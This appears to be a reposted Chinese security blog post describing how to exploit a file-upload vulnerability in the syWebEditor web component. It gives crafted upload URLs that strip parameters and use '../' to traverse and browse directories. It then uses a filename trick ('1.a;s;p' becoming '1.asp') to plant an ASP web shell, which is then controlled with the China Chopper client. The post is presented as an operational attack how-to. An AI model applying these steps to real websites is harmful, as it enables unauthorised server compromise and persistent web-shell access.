syWebEditor 上传漏洞的又一利用方法

admin 2021年4月3日19:39:14评论81 views字数 705阅读2分21秒阅读模式

    1,网上流传的syWebEditor上传漏洞,但是还是利用解析漏洞配合才能奏效,但是大部分情况下,我们发现上传的1.asp;2.gif文件,变成了1.asp2.gif,其中“;”被过滤掉了

http://www.xxxx.com/syWebEditor/Sel_UploadFile.asp?obj=ProPhoto&fileType=gif|jpg|png|&filePathType=1&filePath=/PhotoFile/ProFile/

    我们可以这样做,修改上传路径:

http://www.xxxxx.com/syWebEditor/Sel_UploadFile.asp?filePathType=1&filePath=../

    主要是删除 obj=ProPhoto&fileType=& 这两个参数,比较碍事;修改filePath=参数还能够浏览目录,当然是在目录权限不严格的情况下;

    2,上传文件,把我们上传的文件命修改为 1.a;s;p 就好了,上传成功,系统自动为我们修改成1.asp,而且也摆脱了那个解析漏洞的限制。

http://www.xxxxx.com/syWebEditor/1.asp

    菜刀连接完事。

文章来源于lcx.cc:syWebEditor 上传漏洞的又一利用方法

相关推荐: 建站之星 SiteStar V2.0 任意文件上传漏洞

发布日期:2011-03.16 发布作者:cnryan 影响版本:SiteStar V2.0 beta 官方网站:http://www.sitestar.cn/ 漏洞类型:文件上传 [1]漏洞概述: SiteStar V2.0没有正确限制文件的上传,远程攻击者…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:39:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   syWebEditor 上传漏洞的又一利用方法http://cn-sec.com/archives/324184.html

发表评论

匿名网友 填写信息